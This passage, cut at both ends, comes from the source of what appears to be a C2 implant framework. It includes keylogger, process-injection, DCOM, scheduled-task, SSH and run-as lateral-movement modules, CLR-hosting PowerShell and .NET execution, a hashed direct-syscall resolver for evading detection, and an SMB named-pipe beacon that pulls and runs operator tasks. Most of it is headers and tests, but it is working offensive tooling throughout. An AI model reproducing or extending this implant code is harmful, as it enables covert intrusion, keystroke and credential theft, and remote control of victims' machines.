| 34 | std::string errMsg; 35 | module->errorCodeToMsg(ret, errMsg); 36 | 37 | std::cout << ret.returnvalue() << std::endl; 38 | std::cerr << errMsg << std::endl; 39 | } 40 | 41 | std::cout << "Finish" << std::endl; 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /modules/MkDir/tests/testsMkDir.cpp: -------------------------------------------------------------------------------- 1 | #include "../MkDir.hpp" 2 | #include 3 | 4 | bool testMkDir(); 5 | 6 | int main() 7 | { 8 | bool res; 9 | std::cout << "[+] testMkDir" << std::endl; 10 | res = testMkDir(); 11 | if (res) 12 | std::cout << "[+] Sucess" << std::endl; 13 | else 14 | std::cout << "[-] Failed" << std::endl; 15 | 16 | return !res; 17 | } 18 | 19 | bool testMkDir() 20 | { 21 | namespace fs = std::filesystem; 22 | fs::path temp = fs::temp_directory_path() / "c2core_mkdir_test"; 23 | fs::remove_all(temp); 24 | bool ok = true; 25 | 26 | { 27 | MkDir mk; 28 | std::vector cmd = {"mkDir", temp.string()}; 29 | C2Message msg, ret; 30 | mk.init(cmd, msg); 31 | msg.set_cmd(temp.string()); 32 | mk.process(msg, ret); 33 | ok &= ret.returnvalue().find("Directory created") != std::string::npos; 34 | ok &= fs::exists(temp); 35 | } 36 | 37 | { 38 | MkDir mk; 39 | std::vector cmd = {"mkDir", temp.string()}; 40 | C2Message msg, ret; 41 | mk.init(cmd, msg); 42 | msg.set_cmd(temp.string()); 43 | mk.process(msg, ret); 44 | ok &= ret.returnvalue().find("Already exists") != std::string::npos; 45 | } 46 | 47 | fs::remove_all(temp); 48 | return ok; 49 | } 50 | -------------------------------------------------------------------------------- /modules/PwSh/HostMalloc.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | 9 | typedef enum 10 | { 11 | MEM_ALLOC_LIST_HEAD, 12 | MEM_ALLOC_MALLOC, 13 | MEM_ALLOC_VIRTUALALLOC, 14 | MEM_ALLOC_MAPPED_FILE 15 | } memAllocTracker; 16 | 17 | 18 | typedef struct _MemAllocEntry 19 | { 20 | SLIST_ENTRY allocEntry; 21 | void* Address; 22 | SIZE_T size; 23 | memAllocTracker type; 24 | } MemAllocEntry; 25 | 26 | 27 | class MyHostMalloc : public IHostMalloc 28 | { 29 | public: 30 | MyHostMalloc(void); 31 | ~MyHostMalloc(void); 32 | 33 | virtual HRESULT STDMETHODCALLTYPE QueryInterface(REFIID riid,void **ppv); 34 | virtual ULONG STDMETHODCALLTYPE AddRef(void); 35 | virtual ULONG STDMETHODCALLTYPE Release(void); 36 | 37 | virtual HRESULT Alloc(SIZE_T cbSize, EMemoryCriticalLevel eCriticalLevel, void** ppMem); 38 | virtual HRESULT DebugAlloc(SIZE_T cbSize, EMemoryCriticalLevel eCriticalLevel, char* pszFileName, int iLineNo, void** ppMem); 39 | virtual HRESULT Free(void* pMem); 40 | 41 | HANDLE hHeap; 42 | 43 | const std::vector& getMemAllocList() 44 | { 45 | return m_memAllocList; 46 | } 47 | 48 | protected: 49 | DWORD count; 50 | 51 | private: 52 | std::vector m_memAllocList; 53 | }; -------------------------------------------------------------------------------- /modules/DotnetExec/HostMalloc.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | 9 | typedef enum 10 | { 11 | MEM_ALLOC_LIST_HEAD, 12 | MEM_ALLOC_MALLOC, 13 | MEM_ALLOC_VIRTUALALLOC, 14 | MEM_ALLOC_MAPPED_FILE 15 | } memAllocTracker; 16 | 17 | 18 | typedef struct _MemAllocEntry 19 | { 20 | SLIST_ENTRY allocEntry; 21 | void* Address; 22 | SIZE_T size; 23 | memAllocTracker type; 24 | } MemAllocEntry; 25 | 26 | 27 | class MyHostMalloc : public IHostMalloc 28 | { 29 | public: 30 | MyHostMalloc(void); 31 | ~MyHostMalloc(void); 32 | 33 | virtual HRESULT STDMETHODCALLTYPE QueryInterface(REFIID riid,void **ppv); 34 | virtual ULONG STDMETHODCALLTYPE AddRef(void); 35 | virtual ULONG STDMETHODCALLTYPE Release(void); 36 | 37 | virtual HRESULT Alloc(SIZE_T cbSize, EMemoryCriticalLevel eCriticalLevel, void** ppMem); 38 | virtual HRESULT DebugAlloc(SIZE_T cbSize, EMemoryCriticalLevel eCriticalLevel, char* pszFileName, int iLineNo, void** ppMem); 39 | virtual HRESULT Free(void* pMem); 40 | 41 | HANDLE hHeap; 42 | 43 | const std::vector& getMemAllocList() 44 | { 45 | return m_memAllocList; 46 | } 47 | 48 | protected: 49 | DWORD count; 50 | 51 | private: 52 | std::vector m_memAllocList; 53 | }; -------------------------------------------------------------------------------- /modules/ScreenShot/HandleGuards.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "windows.h" 4 | #include 5 | 6 | 7 | namespace guards 8 | { 9 | 10 | 11 | class CDCGuard 12 | { 13 | public: 14 | explicit CDCGuard(HDC h) 15 | :h_(h) 16 | { 17 | 18 | } 19 | 20 | ~CDCGuard(void) 21 | { 22 | if(h_)DeleteDC(h_); 23 | } 24 | 25 | void reset(HDC h) 26 | { 27 | if(h_ == h) 28 | return; 29 | if(h_)DeleteDC(h_); 30 | h_ = h; 31 | } 32 | 33 | void release() 34 | { 35 | h_ = 0; 36 | } 37 | 38 | HDC get() 39 | { 40 | return h_; 41 | } 42 | 43 | private: 44 | HDC h_; 45 | CDCGuard(const CDCGuard&); 46 | CDCGuard& operator=(CDCGuard&); 47 | 48 | }; 49 | 50 | 51 | class CBitMapGuard 52 | { 53 | public: 54 | explicit CBitMapGuard(HBITMAP h) 55 | :h_(h) 56 | { 57 | 58 | } 59 | 60 | ~CBitMapGuard(void) 61 | { 62 | if(h_)DeleteObject(h_); 63 | } 64 | 65 | void reset(HBITMAP h) 66 | { 67 | if(h_ == h) 68 | return; 69 | if(h_)DeleteObject(h_); 70 | h_ = h; 71 | } 72 | 73 | HBITMAP get() 74 | { 75 | return h_; 76 | } 77 | 78 | private: 79 | HBITMAP h_; 80 | CBitMapGuard(const CBitMapGuard&); 81 | CBitMapGuard& operator=(CBitMapGuard&); 82 | 83 | }; 84 | 85 | 86 | } 87 | -------------------------------------------------------------------------------- /modules/EnumerateRdpSessions/EnumerateRdpSessions.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | #include 6 | #include 7 | 8 | class EnumerateRdpSessions : public ModuleCmd 9 | { 10 | public: 11 | struct Parameters 12 | { 13 | std::string server; 14 | }; 15 | 16 | static constexpr int ERROR_WINDOWS_ONLY = 1; 17 | static constexpr int ERROR_OPEN_SERVER = 2; 18 | static constexpr int ERROR_ENUMERATE_SESSIONS = 3; 19 | 20 | EnumerateRdpSessions(); 21 | ~EnumerateRdpSessions(); 22 | 23 | std::string getInfo() override; 24 | 25 | int init(std::vector& splitedCmd, C2Message& c2Message) override; 26 | int process(C2Message& c2Message, C2Message& c2RetMessage) override; 27 | int errorCodeToMsg(const C2Message& c2RetMessage, std::string& errorMsg) override; 28 | int followUp(const C2Message& c2RetMessage) override; 29 | int osCompatibility() override 30 | { 31 | return OS_WINDOWS; 32 | } 33 | 34 | private: 35 | std::string packParameters(const Parameters& params) const; 36 | Parameters unpackParameters(const std::string& data) const; 37 | }; 38 | 39 | #ifdef _WIN32 40 | extern "C" __declspec(dllexport) EnumerateRdpSessions* EnumerateRdpSessionsConstructor(); 41 | #else 42 | extern "C" __attribute__((visibility("default"))) EnumerateRdpSessions* EnumerateRdpSessionsConstructor(); 43 | #endif 44 | -------------------------------------------------------------------------------- /modules/DcomExec/DcomExec.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | #include 6 | #include 7 | 8 | class DcomExec : public ModuleCmd 9 | { 10 | public: 11 | DcomExec(); 12 | ~DcomExec(); 13 | 14 | std::string getInfo(); 15 | 16 | int init(std::vector& splitedCmd, C2Message& c2Message); 17 | int process(C2Message& c2Message, C2Message& c2RetMessage); 18 | int errorCodeToMsg(const C2Message& c2RetMessage, std::string& errorMsg); 19 | 20 | int osCompatibility() 21 | { 22 | return OS_WINDOWS; 23 | } 24 | 25 | private: 26 | struct Parameters 27 | { 28 | std::string hostname; 29 | std::string progId; 30 | std::string command; 31 | std::string arguments; 32 | std::string workingDir; 33 | std::string spn; 34 | std::string username; 35 | std::string password; 36 | bool noPassword; 37 | }; 38 | 39 | std::string packParameters(const Parameters& params) const; 40 | Parameters unpackParameters(const std::string& data) const; 41 | 42 | #ifdef _WIN32 43 | int executeRemote(const Parameters& params, std::string& result) const; 44 | #endif 45 | }; 46 | 47 | #ifdef _WIN32 48 | extern "C" __declspec(dllexport) DcomExec* DcomExecConstructor(); 49 | #else 50 | extern "C" __attribute__((visibility("default"))) DcomExec* DcomExecConstructor(); 51 | #endif 52 | 53 | -------------------------------------------------------------------------------- /modules/ModuleCmd/syscall.cpp: -------------------------------------------------------------------------------- 1 | #include "syscall.hpp" 2 | 3 | 4 | DWORD GlobalHash = 0x0; 5 | 6 | 7 | EXTERN_C DWORD getGlobalHash() 8 | { 9 | return GlobalHash; 10 | } 11 | 12 | 13 | DWORD SW3_HashSyscall(const char *FunctionName) 14 | { 15 | DWORD Hash = 0x811C9DC5; // FNV offset basis 16 | DWORD FNV_prime = 0x01000193; // FNV prime 17 | 18 | int c; 19 | while (c = *FunctionName++) 20 | { 21 | Hash ^= c; // XOR the byte into the lowest byte of the hash 22 | Hash *= FNV_prime; // Multiply by FNV prime 23 | } 24 | 25 | return Hash & 0xFFFFFFFF; // Ensure the result is a 32-bit hash 26 | } 27 | 28 | bool compareEntry(Entry i1, Entry i2) 29 | { 30 | return (i1.getAddress() < i2.getAddress()); 31 | } 32 | 33 | SyscallList* SyscallList::singleton_= nullptr; 34 | 35 | 36 | SyscallList *SyscallList::GetInstance() 37 | { 38 | if(singleton_==nullptr){ 39 | singleton_ = new SyscallList(); 40 | } 41 | return singleton_; 42 | } 43 | 44 | 45 | EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash) 46 | { 47 | SyscallList* singleton = SyscallList::GetInstance(); 48 | return singleton->getSyscallNumber(FunctionHash); 49 | } 50 | 51 | 52 | EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash) 53 | { 54 | SyscallList* singleton = SyscallList::GetInstance(); 55 | return singleton->getSyscallAddress(FunctionHash); 56 | } 57 | 58 | -------------------------------------------------------------------------------- /modules/TaskScheduler/TaskScheduler.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | #include 6 | #include 7 | 8 | class TaskScheduler : public ModuleCmd 9 | { 10 | public: 11 | TaskScheduler(); 12 | ~TaskScheduler(); 13 | 14 | std::string getInfo(); 15 | 16 | int init(std::vector& splitedCmd, C2Message& c2Message); 17 | int process(C2Message& c2Message, C2Message& c2RetMessage); 18 | int errorCodeToMsg(const C2Message& c2RetMessage, std::string& errorMsg); 19 | 20 | int osCompatibility() 21 | { 22 | return OS_WINDOWS; 23 | } 24 | 25 | private: 26 | struct Parameters 27 | { 28 | std::string server; 29 | std::string taskName; 30 | std::string command; 31 | std::string arguments; 32 | std::string username; 33 | std::string password; 34 | bool skipRun = false; 35 | bool deleteAfterRun = false; 36 | }; 37 | 38 | std::string packParameters(const Parameters& params) const; 39 | Parameters unpackParameters(const std::string& data) const; 40 | 41 | #ifdef _WIN32 42 | int executeTask(const Parameters& params, std::string& result) const; 43 | #endif 44 | }; 45 | 46 | #ifdef _WIN32 47 | extern "C" __declspec(dllexport) TaskScheduler* TaskSchedulerConstructor(); 48 | #else 49 | extern "C" __attribute__((visibility("default"))) TaskScheduler* TaskSchedulerConstructor(); 50 | #endif 51 | -------------------------------------------------------------------------------- /modules/KeyLogger/tests/testsKeyLogger.cpp: -------------------------------------------------------------------------------- 1 | #include "../KeyLogger.hpp" 2 | 3 | #ifdef __linux__ 4 | #elif _WIN32 5 | #include 6 | #endif 7 | 8 | #include 9 | #include 10 | 11 | 12 | bool testKeyLogger(); 13 | 14 | int main() 15 | { 16 | bool res; 17 | 18 | std::cout << "[+] testKeyLogger" << std::endl; 19 | res = testKeyLogger(); 20 | if (res) 21 | std::cout << "[+] Sucess" << std::endl; 22 | else 23 | std::cout << "[-] Failed" << std::endl; 24 | 25 | return 0; 26 | } 27 | 28 | bool testKeyLogger() 29 | { 30 | 31 | std::unique_ptr keyLogger = std::make_unique(); 32 | { 33 | C2Message c2Message; 34 | c2Message.set_instruction("keyLogger"); 35 | c2Message.set_args("start"); 36 | 37 | C2Message c2RetMessage; 38 | keyLogger->process(c2Message, c2RetMessage); 39 | 40 | std::this_thread::sleep_for (std::chrono::seconds(2)); 41 | 42 | keyLogger->recurringExec(c2RetMessage) ; 43 | keyLogger->followUp(c2RetMessage); 44 | 45 | std::vector splitedCmd; 46 | splitedCmd.push_back("keyLogger"); 47 | splitedCmd.push_back("get"); 48 | C2Message c2MessageFinal; 49 | keyLogger->init(splitedCmd, c2MessageFinal); 50 | 51 | std::cout << "Result:\n" << c2MessageFinal.returnvalue() << std::endl; 52 | } 53 | 54 | return true; 55 | } 56 | -------------------------------------------------------------------------------- /modules/DotnetExec/tests/project.rc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define VER_FILEVERSION 1,0,0,0 4 | #define VER_FILEVERSION_STR "1.0.0.0\0" 5 | 6 | #define VER_PRODUCTVERSION 1,0,0,0 7 | #define VER_PRODUCTVERSION_STR "1.0.0\0" 8 | 9 | #ifndef DEBUG 10 | #define VER_DEBUG 0 11 | #else 12 | #define VER_DEBUG VS_FF_DEBUG 13 | #endif 14 | 15 | VS_VERSION_INFO VERSIONINFO 16 | FILEVERSION VER_FILEVERSION 17 | PRODUCTVERSION VER_PRODUCTVERSION 18 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 19 | //FILEFLAGS (VER_PRIVATEBUILD|VER_PRERELEASE|VER_DEBUG) 20 | FILEOS VOS__WINDOWS32 21 | FILETYPE VFT_APP 22 | FILESUBTYPE VFT2_UNKNOWN 23 | BEGIN 24 | BLOCK "StringFileInfo" 25 | BEGIN 26 | BLOCK "040904E4" // United States (English) 27 | BEGIN 28 | VALUE "CompanyName", "CompanyName\0" 29 | VALUE "FileDescription", "testsGoodClrHost\0" 30 | VALUE "FileVersion", VER_FILEVERSION_STR 31 | VALUE "InternalName", "testsGoodClrHost\0" 32 | VALUE "OriginalFilename", "testsGoodClrHost.exe\0" 33 | VALUE "ProductName", "testsGoodClrHost\0" 34 | VALUE "ProductVersion", VER_PRODUCTVERSION_STR 35 | END 36 | END 37 | 38 | BLOCK "VarFileInfo" 39 | BEGIN 40 | VALUE "Translation", 0x409, 1252 41 | END 42 | END 43 | -------------------------------------------------------------------------------- /modules/Inject/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | 3 | if(WIN32) 4 | set(SYSCALL_OBJ "../ModuleCmd/syscall.x86.obj") 5 | if (CMAKE_SIZEOF_VOID_P EQUAL 8) 6 | set(SYSCALL_OBJ "../ModuleCmd/syscall.x64.obj") 7 | endif() 8 | 9 | add_library(Inject SHARED 10 | Inject.cpp 11 | ../ModuleCmd/syscall.cpp 12 | ${SYSCALL_OBJ} 13 | ) 14 | else() 15 | add_library(Inject SHARED Inject.cpp) 16 | endif() 17 | 18 | set_property(TARGET Inject PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 19 | 20 | target_link_libraries(Inject PRIVATE Donut ) 21 | 22 | add_custom_command(TARGET Inject POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 23 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 24 | 25 | if(C2CORE_BUILD_TESTS) 26 | if(WIN32) 27 | add_executable(testsInject tests/testsInject.cpp Inject.cpp ../ModuleCmd/syscall.cpp ${SYSCALL_OBJ}) 28 | target_link_libraries(testsInject PRIVATE Donut ) 29 | else() 30 | add_executable(testsInject tests/testsInject.cpp Inject.cpp) 31 | target_link_libraries(testsInject PRIVATE Donut ${aplib64} ) 32 | endif() 33 | 34 | add_custom_command(TARGET testsInject POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 35 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 36 | 37 | add_test(NAME testsInject COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 38 | endif() 39 | -------------------------------------------------------------------------------- /modules/SpawnAs/SpawnAs.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | #ifdef __linux__ 6 | #define LOGON32_LOGON_INTERACTIVE 2 7 | #define LOGON32_LOGON_NETWORK 3 8 | #define LOGON32_LOGON_BATCH 4 9 | #define LOGON32_LOGON_SERVICE 5 10 | #define LOGON32_LOGON_UNLOCK 7 11 | #define LOGON32_LOGON_NETWORK_CLEARTEXT 8 12 | #define LOGON32_LOGON_NEW_CREDENTIALS 9 13 | #endif 14 | 15 | 16 | class SpawnAs : public ModuleCmd 17 | { 18 | 19 | public: 20 | SpawnAs(); 21 | ~SpawnAs(); 22 | 23 | std::string getInfo(); 24 | 25 | int init(std::vector& splitedCmd, C2Message& c2Message); 26 | int process(C2Message& c2Message, C2Message& c2RetMessage); 27 | int osCompatibility() 28 | { 29 | return OS_WINDOWS; 30 | } 31 | 32 | int errorCodeToMsg(const C2Message& c2RetMessage, std::string& errorMsg) override; 33 | 34 | private: 35 | 36 | struct Options 37 | { 38 | int logonType = 2; // LOGON32_LOGON_INTERACTIVE 39 | bool loadProfile = true; 40 | bool showWindow = false; 41 | }; 42 | 43 | std::string packParameters(const Options& options) const; 44 | Options unpackParameters(const std::string& data) const; 45 | 46 | }; 47 | 48 | 49 | #ifdef _WIN32 50 | 51 | extern "C" __declspec(dllexport) SpawnAs * A_SpawnAsConstructor(); 52 | 53 | #else 54 | 55 | extern "C" __attribute__((visibility("default"))) SpawnAs * SpawnAsConstructor(); 56 | 57 | #endif 58 | -------------------------------------------------------------------------------- /modules/Remove/tests/testsRemove.cpp: -------------------------------------------------------------------------------- 1 | #include "../Remove.hpp" 2 | #include 3 | 4 | bool testRemove(); 5 | 6 | int main() 7 | { 8 | bool res; 9 | std::cout << "[+] testRemove" << std::endl; 10 | res = testRemove(); 11 | if (res) 12 | std::cout << "[+] Sucess" << std::endl; 13 | else 14 | std::cout << "[-] Failed" << std::endl; 15 | 16 | return !res; 17 | } 18 | 19 | bool testRemove() 20 | { 21 | namespace fs = std::filesystem; 22 | fs::path temp = fs::temp_directory_path() / "c2core_remove_test"; 23 | fs::remove_all(temp); 24 | fs::create_directories(temp / "sub"); 25 | std::ofstream(temp / "sub" / "file.txt") << "data"; 26 | 27 | bool ok = true; 28 | 29 | // remove file 30 | { 31 | Remove rm; 32 | std::vector cmd = {"remove", (temp / "sub" / "file.txt").string()}; 33 | C2Message msg, ret; 34 | rm.init(cmd, msg); 35 | msg.set_cmd((temp / "sub" / "file.txt").string()); 36 | rm.process(msg, ret); 37 | ok &= !fs::exists(temp / "sub" / "file.txt"); 38 | } 39 | 40 | // remove directory 41 | { 42 | Remove rm; 43 | std::vector cmd = {"remove", temp.string()}; 44 | C2Message msg, ret; 45 | rm.init(cmd, msg); 46 | msg.set_cmd(temp.string()); 47 | rm.process(msg, ret); 48 | ok &= !fs::exists(temp); 49 | } 50 | 51 | fs::remove_all(temp); 52 | return ok; 53 | } 54 | -------------------------------------------------------------------------------- /modules/PwSh/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | if(WIN32) 3 | add_library(PwSh SHARED PwSh.cpp HostControl.cpp AssemblyManager.cpp AssemblyStore.cpp HostMalloc.cpp MemoryManager.cpp ../ModuleCmd/syscall.cpp ../ModuleCmd/syscall.x64.obj ) 4 | else() 5 | add_library(PwSh SHARED PwSh.cpp) 6 | endif() 7 | set_property(TARGET PwSh PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 8 | target_link_libraries(PwSh ) 9 | add_custom_command(TARGET PwSh POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 10 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 11 | 12 | if(C2CORE_BUILD_TESTS) 13 | if(WIN32) 14 | add_executable(testsPwSh tests/testsPwSh.cpp PwSh.cpp HostControl.cpp AssemblyManager.cpp AssemblyStore.cpp HostMalloc.cpp MemoryManager.cpp ../ModuleCmd/syscall.cpp ../ModuleCmd/syscall.x64.obj) 15 | else() 16 | add_executable(testsPwSh tests/testsPwSh.cpp PwSh.cpp) 17 | endif() 18 | # add_executable(testsPwSh WIN32 tests/testsPwSh.cpp PwSh.cpp HostControl.cpp AssemblyManager.cpp AssemblyStore.cpp HostMalloc.cpp MemoryManager.cpp ../ModuleCmd/syscall.cpp ../ModuleCmd/syscall.x64.obj) 19 | target_link_libraries(testsPwSh ) 20 | set_property(TARGET testsPwSh PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 21 | add_custom_command(TARGET testsPwSh POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 22 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 23 | 24 | add_test(NAME testsPwSh COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 25 | endif() -------------------------------------------------------------------------------- /modules/Registry/Registry.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | #include 6 | #include 7 | 8 | class Registry : public ModuleCmd 9 | { 10 | public: 11 | Registry(); 12 | ~Registry(); 13 | 14 | std::string getInfo(); 15 | 16 | int init(std::vector& splitedCmd, C2Message& c2Message); 17 | int process(C2Message& c2Message, C2Message& c2RetMessage); 18 | int errorCodeToMsg(const C2Message& c2RetMessage, std::string& errorMsg); 19 | 20 | int osCompatibility() 21 | { 22 | return OS_WINDOWS; 23 | } 24 | 25 | enum class Operation : uint32_t 26 | { 27 | SetValue = 0, 28 | DeleteValue, 29 | QueryValue, 30 | CreateKey, 31 | DeleteKey 32 | }; 33 | 34 | struct Parameters 35 | { 36 | Operation operation = Operation::SetValue; 37 | std::string server; 38 | std::string rootKey; 39 | std::string subKey; 40 | std::string valueName; 41 | std::string valueData; 42 | std::string valueType; 43 | }; 44 | 45 | private: 46 | std::string packParameters(const Parameters& params) const; 47 | Parameters unpackParameters(const std::string& data) const; 48 | 49 | #ifdef _WIN32 50 | int execute(const Parameters& params, std::string& result) const; 51 | #endif 52 | }; 53 | 54 | #ifdef _WIN32 55 | extern "C" __declspec(dllexport) Registry* RegistryConstructor(); 56 | #else 57 | extern "C" __attribute__((visibility("default"))) Registry* RegistryConstructor(); 58 | #endif 59 | -------------------------------------------------------------------------------- /modules/KillProcess/tests/testsKillProcess.cpp: -------------------------------------------------------------------------------- 1 | #include "../KillProcess.hpp" 2 | #include "../../ModuleCmd/Tools.hpp" 3 | #include 4 | #include 5 | #ifdef __linux__ 6 | #include 7 | #include 8 | #elif _WIN32 9 | #include 10 | #endif 11 | 12 | bool testKillProcess(); 13 | 14 | int main() 15 | { 16 | bool res; 17 | std::cout << "[+] testKillProcess" << std::endl; 18 | res = testKillProcess(); 19 | if (res) 20 | std::cout << "[+] Sucess" << std::endl; 21 | else 22 | std::cout << "[-] Failed" << std::endl; 23 | 24 | return !res; 25 | } 26 | 27 | bool testKillProcess() 28 | { 29 | bool ok = true; 30 | 31 | int pid; 32 | #ifdef __linux__ 33 | pid = launchProcess("sleep 30"); 34 | std::this_thread::sleep_for(std::chrono::seconds(1)); 35 | #elif _WIN32 36 | pid = launchProcess("C:\\Windows\\System32\\notepad.exe"); 37 | Sleep(1000); 38 | #endif 39 | 40 | KillProcess kp; 41 | std::vector cmd = {"killProcess", std::to_string(pid)}; 42 | C2Message msg, ret; 43 | kp.init(cmd, msg); 44 | msg.set_pid(pid); 45 | kp.process(msg, ret); 46 | 47 | #ifdef __linux__ 48 | ok &= ret.errorCode() == -1; 49 | #elif _WIN32 50 | HANDLE h = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid); 51 | if (h) 52 | { 53 | DWORD code = 0; 54 | bool alive = GetExitCodeProcess(h, &code) && code == STILL_ACTIVE; 55 | CloseHandle(h); 56 | ok &= !alive; 57 | } 58 | else 59 | { 60 | ok &= true; 61 | } 62 | #endif 63 | return ok; 64 | } 65 | -------------------------------------------------------------------------------- /modules/KeyLogger/KeyLogger.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | #include 5 | 6 | 7 | class KeyLogger : public ModuleCmd 8 | { 9 | 10 | public: 11 | KeyLogger(); 12 | ~KeyLogger(); 13 | 14 | std::string getInfo(); 15 | 16 | int init(std::vector& splitedCmd, C2Message& c2Message); 17 | int process(C2Message& c2Message, C2Message& c2RetMessage); 18 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 19 | int recurringExec(C2Message& c2RetMessage); 20 | int followUp(const C2Message &c2RetMessage); 21 | int osCompatibility() 22 | { 23 | return OS_WINDOWS; 24 | } 25 | 26 | bool getIsThreadLaunched() 27 | { 28 | return m_isThreadLaunched; 29 | } 30 | 31 | int setKey(char charPressed) 32 | { 33 | std::lock_guard guard(m_mutex); 34 | m_saveKeyStrock.push_back(charPressed); 35 | return 0; 36 | } 37 | 38 | int dumpKeys(std::string& output) 39 | { 40 | std::lock_guard guard(m_mutex); 41 | output = m_saveKeyStrock; 42 | m_saveKeyStrock.clear(); 43 | return 0; 44 | } 45 | 46 | private: 47 | int threadID; 48 | bool m_isThreadLaunched; 49 | std::string m_saveKeyStrock; 50 | std::mutex m_mutex; 51 | 52 | static void run(void* keyLoggerPtr); 53 | 54 | }; 55 | 56 | 57 | #ifdef _WIN32 58 | 59 | extern "C" __declspec(dllexport) KeyLogger * KeyLoggerConstructor(); 60 | 61 | #else 62 | 63 | extern "C" __attribute__((visibility("default"))) KeyLogger * KeyLoggerConstructor(); 64 | 65 | #endif 66 | -------------------------------------------------------------------------------- /beacon/BeaconSmb.cpp: -------------------------------------------------------------------------------- 1 | #include "BeaconSmb.hpp" 2 | #include 3 | 4 | using namespace std; 5 | using namespace PipeHandler; 6 | 7 | 8 | BeaconSmb::BeaconSmb(std::string& config, const std::string& ip, const std::string& pipeName) 9 | : Beacon() 10 | { 11 | // beacon and modules config 12 | initConfig(config); 13 | 14 | m_clientSmb = new PipeHandler::Client(ip, pipeName); 15 | } 16 | 17 | 18 | BeaconSmb::~BeaconSmb() 19 | { 20 | delete m_clientSmb; 21 | } 22 | 23 | 24 | void BeaconSmb::checkIn() 25 | { 26 | SPDLOG_DEBUG("initConnection"); 27 | while(!m_clientSmb->initConnection()) 28 | { 29 | std::this_thread::sleep_for(std::chrono::milliseconds(333)); 30 | SPDLOG_DEBUG("initConnection"); 31 | } 32 | 33 | std::string output; 34 | taskResultsToCmd(output); 35 | 36 | SPDLOG_DEBUG("sending output.size {0}", std::to_string(output.size())); 37 | 38 | bool res = m_clientSmb->sendData(output); 39 | if(res) 40 | { 41 | string input; 42 | while(input.empty()) 43 | { 44 | res=m_clientSmb->receiveData(input); 45 | std::this_thread::sleep_for(std::chrono::milliseconds(50)); 46 | } 47 | if(res) 48 | { 49 | SPDLOG_DEBUG("received input.size {0}", std::to_string(input.size())); 50 | 51 | if(!input.empty()) 52 | { 53 | cmdToTasks(input); 54 | } 55 | } 56 | else 57 | { 58 | SPDLOG_DEBUG("Receive failed"); 59 | } 60 | } 61 | else 62 | SPDLOG_DEBUG("Send failed"); 63 | 64 | 65 | m_clientSmb->closeConnection(); 66 | } 67 | 68 | -------------------------------------------------------------------------------- /modules/SshExec/SshExec.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | #include 6 | #include 7 | 8 | class SshExec : public ModuleCmd 9 | { 10 | public: 11 | SshExec(); 12 | ~SshExec(); 13 | 14 | std::string getInfo(); 15 | 16 | int init(std::vector& splitedCmd, C2Message& c2Message); 17 | int process(C2Message& c2Message, C2Message& c2RetMessage); 18 | int errorCodeToMsg(const C2Message& c2RetMessage, std::string& errorMsg); 19 | 20 | int osCompatibility() 21 | { 22 | return OS_LINUX | OS_WINDOWS; 23 | } 24 | 25 | static constexpr int ErrorLibssh2Init = 1; 26 | static constexpr int ErrorSocketInit = 2; 27 | static constexpr int ErrorResolve = 3; 28 | static constexpr int ErrorConnect = 4; 29 | static constexpr int ErrorSessionInit = 5; 30 | static constexpr int ErrorHandshake = 6; 31 | static constexpr int ErrorAuthentication = 7; 32 | static constexpr int ErrorChannelOpen = 8; 33 | static constexpr int ErrorExecute = 9; 34 | 35 | private: 36 | struct Parameters 37 | { 38 | std::string host; 39 | std::string port = "22"; 40 | std::string username; 41 | std::string password; 42 | std::string command; 43 | }; 44 | 45 | std::string packParameters(const Parameters& params) const; 46 | Parameters unpackParameters(const std::string& data) const; 47 | int executeSshCommand(const Parameters& params, std::string& result) const; 48 | }; 49 | 50 | #ifdef _WIN32 51 | extern "C" __declspec(dllexport) SshExec* SshExecConstructor(); 52 | #else 53 | extern "C" __attribute__((visibility("default"))) SshExec* SshExecConstructor(); 54 | #endif 55 | -------------------------------------------------------------------------------- /modules/Inject/tests/testsInject.cpp: -------------------------------------------------------------------------------- 1 | #include "../Inject.hpp" 2 | #include "../../ModuleCmd/Tools.hpp" 3 | 4 | #ifdef __linux__ 5 | #elif _WIN32 6 | #include 7 | #endif 8 | 9 | bool testInject(); 10 | 11 | int main() 12 | { 13 | bool res; 14 | 15 | std::cout << "[+] testInject" << std::endl; 16 | res = testInject(); 17 | if(res) 18 | std::cout << "[+] Sucess" << std::endl; 19 | else 